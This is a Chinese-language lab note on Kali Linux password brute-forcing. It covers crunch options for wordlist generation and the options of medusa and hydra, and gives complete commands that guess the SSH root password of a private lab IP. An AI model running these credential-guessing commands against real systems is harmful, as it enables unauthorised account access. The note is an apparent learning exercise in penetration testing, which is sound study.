kali linux 爆破工具實驗
參考:【https://blog.csdn.net/lakeside1/article/details/80785956;https://blog.csdn.net/u010984277/article/details/50792816】
密碼本生成命令:
crunch
命令引數:
-b #按大小分割字典檔案,比如後跟20mib
-c #密碼個數(行數),比如8000
-d #限制出現相同元素的個數(至少出現元素個數),-d 3就不會出現zzfffffgggg之類的
-e #定義停止生成密碼 ,比如-e 222222:到222222停止生成密碼
-f #呼叫密碼庫檔案,比如/usr/share/crunch/charset.lst
-i #改變輸出格式
-l #與-t搭配使用
-m #與-p搭配使用
-o #儲存為
-p #定義密碼元素(最大最小長度失效,所有組合嘗試一遍,字串加空格以字串為單位)
-q #讀取字典(指定文字檔案,最大最小長度失效,每行之間相互排序)
-r #定義從某一個地方重新開始
-s #第一個密碼,從xxx開始
-t #定義輸出格式
@ 代表小寫字母 lalpha
, 代表大寫字母 ualpha
% 代表數字 numeric
^ 代表符號 symbols
+ 佔位符
\ 轉義符(空格,負號)
-z #打包壓縮,格式支援 gzip, bzip2, lzma, 7z(壓縮率最大)
---------------------
生成密碼本的完整命令:
crunch 4 4 -f /usr/share/crunch/charset.lst mixalpha-numeric-all-space -o /home/word/mydord1.txt -c 960
該命令表示 使用常用的社工密碼序列生成密碼,每個密碼最大最小都是4位,每個檔案包含960密碼;
******************************************************************************************************************************************
爆破工具1:medusa 使用
-h [TEXT] 目標IP
-H [FILE] 目標主機檔案
-u [TEXT] 使用者名稱
-U [FILE] 使用者名稱檔案
-p [TEXT] 密碼
-P [FILE] 密碼檔案
-C [FILE] 組合條目檔案
-O [FILE] 檔案日誌資訊
-e [n/s/ns] N意為空密碼,S意為密碼與使用者名稱相同
-M [TEXT] 模組執行名稱
-m [TEXT] 傳遞引數到模組
-d 顯示所有的模組名稱
-n [NUM] 使用非預設埠
-s 啟用SSL
-r [NUM] 重試間隔時間,預設為3秒
-t [NUM] 設定執行緒數量
-L 並行化,每個使用者使用一個執行緒
-f 在任何主機上找到第一個賬號/密碼後,停止破解
-q 顯示模組的使用資訊
-v [NUM] 詳細級別(0-6)
-w [NUM] 錯誤除錯級別(0-10)
-V 顯示版本
-Z [TEXT] 繼續掃描上一次
---------------------
實驗完整命令:
medusa -P ./myword.txt -M ssh -u root -h 172.23.2.199 -O ./medusa_result.txt
該命令表示 使用密碼本針對IP 199的root使用者猜ssh保密字
*****************************************************************************************************************************************
爆破工具2: hydra
-l 指定賬號
-t 指定執行緒數
-o 指定輸出檔案
-P 指定密碼本
-----------------
實驗完整命令:
hydra -l root -P /home/wordlist01_6.txt -t 1 ssh://172.23.2.199 -o result.txt